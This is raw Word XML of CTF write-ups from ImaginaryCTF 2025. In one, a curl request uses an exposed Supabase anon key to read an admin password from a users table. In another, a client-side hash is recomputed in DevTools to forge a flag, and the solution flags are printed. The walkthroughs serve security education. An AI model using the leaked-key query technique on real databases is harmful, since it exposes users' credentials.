      <w:r w:rsidRPr="005F52EB">
        <w:t>"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRweXhud2l1d3phaGt4dXhyb2pwIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NTE3NjA1MDcsImV4cCI6MjA2NzMzNjUwN30.C3-ninSkfw0RF3ZHJd25MpncuBdEVUmWpMLZgPZ-rqI");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875AC8D" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>This exposes both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569A2F8" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase URL:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> https://dpyxnwiuwzahkxuxrojp.supabase.co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DE6C6" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anon key:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> the long JWT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB1C3C" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="4ECB2EDD">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43670FA0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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF4131" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Supabase exposes its database via a PostgREST API at /rest/v1/&lt;table&gt;.</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:br/>
        <w:t>With the anon key, we can query directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2104ED5D" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>curl -s 'https://dpyxnwiuwzahkxuxrojp.supabase.co/rest/v1/users?select=*&amp;username=eq.admin' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512C63A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  -H 'apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B76D0" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0619D7F1" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="63D1C32D">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DEBE1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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEDA7A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:lastRenderedPageBreak/>
        <w:t>The response reveals the admin row, including the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A03596" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834AF55" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783739C0" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">    "id": "5df6d541-c05e-4630-a862-8c23ec2b5fa9",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF6DD6" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">    "username": "admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15AAF1" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">    "password": "ictf{why_d1d_1_g1v3_u_my_@p1_k3y???}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BD7AA" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549D4EC0" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E30C38" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="01398EF6">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E588C78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Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611C669" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>ictf{why_d1d_1_g1v3_u_my_@p1_k3y???}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038D806" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRDefault="005B2A08"/>
    <w:p w14:paraId="42AD1010" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="438456C7" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="2EF8D21A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="2F24A4BC" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="7C6865E0" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="7F7820F5" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="7F3A20DC" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="7D44E505" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="0B0BB1B5" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="3F1EE494" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="24CCEBDA" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="3C63455A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="0ABAAB8F" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="58A00E1F" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="3F320AFC" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="0295CBE1" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="55DF2202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lastRenderedPageBreak/>
        <w:t>ImaginaryCTF 2025 – Certificate Generator (Eth007 Flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2897DE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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C570420" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">As a thank you for playing our CTF, we’re giving out participation certificates! Each one comes with a custom flag, but I bet you can’t get the flag belonging to </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eth007</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61462FCA" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Target URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA45570" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>https://eth007.me/cert/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E8999" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="46C94575">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1793D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Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB4FE04" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">Visiting the page shows a certificate generator form with fields like </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">, and a preview/download option. The certificate itself is rendered as an </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SVG</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981A5A9" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">Inspecting the page source (Ctrl+U) or using </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> revealed a long JavaScript section responsible for rendering the certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD25CD" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="327A6602">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C600869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Source Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F5CF1" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Key functions inside the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530D5740" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>function customHash(str</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41D919F3" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  let h = 1337;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C5681A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  for (let i=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>0;i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>str.length</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>;i+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>+){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70378BB4" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">    h = (h * 31 + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>str.charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>(i)) ^ (h &gt;&gt;&gt; 7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF76590" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">    h = h &gt;&gt;&gt; 0; // force unsigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370011D1" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B843DD" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>h.toString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>(16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70102CF4" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37998B45" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB"/>
    <w:p w14:paraId="1880AF02" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>function makeFlag(name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BC6AA82" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  const clean = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>name.trim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>() || "anon";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87FB58" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  const h = customHash(clean);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC228B4" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  return `ictf{${h</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>}}`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A02AAD" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20920BE9" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:lastRenderedPageBreak/>
        <w:t>The SVG certificate includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFB40D" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>&lt;desc&gt;ictf{&lt;hash</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>&gt;}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>/desc&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B185D" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag = ictf{customHash(participantName)}</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B25FC3" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="1CA81FAA">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04106342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The Twist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC7CEC" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Inside the rendering function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71112812" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>if (name == "Eth007") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B3F8A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">  name = "REDACTED";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01547F" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64134AED" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>The site blocks users from directly generating Eth007’s certificate — it swaps "Eth007" to "REDACTED".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532E482E" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="78D3746D">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193DDA2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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA704A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Since the flag is purely computed in JavaScript, we can bypass the UI by simply running the hash function ourselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A27197" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>In DevTools Console:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC9C39" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>customHash("Eth007"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>).toString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>(16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573225F9" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>// -&gt; "7b4b3965"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E7B79F" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>Then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C1366" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>makeFlag("Eth007");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800F237" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>// -&gt; "ictf{7b4b3965}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575910BB" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="6326783A">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3AD61" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F14BD" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>ictf{7b4b3965}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF2C4B" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRDefault="005F52EB"/>
    <w:p w14:paraId="5514278F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRDefault="0030196E"/>
    <w:p w14:paraId="530BA976" w14:textId="77777777" w:rsidR="0030196E" w:rsidRDefault="0030196E"/>
    <w:p w14:paraId="6430F7D4" w14:textId="77777777" w:rsidR="0030196E" w:rsidRDefault="0030196E"/>
    <w:p w14:paraId="1EE8BDB2" w14:textId="77777777" w:rsidR="0030196E" w:rsidRDefault="0030196E"/>
    <w:p w14:paraId="58465467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lastRenderedPageBreak/>
        <w:t>redacted (Crypto, 100 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20CE4F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Author:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> Eth007</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solves:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> 287</w:t>
      </w:r>
    </w:p>
